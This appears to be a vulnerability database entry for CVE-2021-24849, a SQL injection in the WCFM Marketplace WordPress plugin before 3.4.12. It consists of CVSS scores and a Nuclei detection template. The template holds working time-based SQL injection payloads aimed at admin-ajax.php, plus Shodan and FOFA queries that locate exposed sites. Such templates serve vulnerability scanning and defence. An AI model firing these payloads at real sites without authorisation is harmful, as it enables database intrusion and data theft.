CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
89.6%
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
id: CVE-2021-24849
info:
name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
remediation: Fixed in 3.4.12
reference:
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
- https://wordpress.org/plugins/wc-multivendor-marketplace/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24849
cwe-id: CWE-89
epss-score: 0.02367
epss-percentile: 0.89814
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: wclovers
product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible
framework: wordpress
shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace
fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace
publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
condition: and
internal: true
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{post_data}}
payloads:
post_data:
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(header, "application/json")'
- 'contains(body, "success")'
condition: and
# digest: 4a0a004730450220762529702cf9c44426ee86704109c265d0bdce11a27ee57d58983eee2afe7e5b022100f0231e5ac1bec978442364e9e2c3216b59cff01248ee65e7565c5c29f7c0d188:922c64590222798bb761d5b6d8e72950
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
89.6%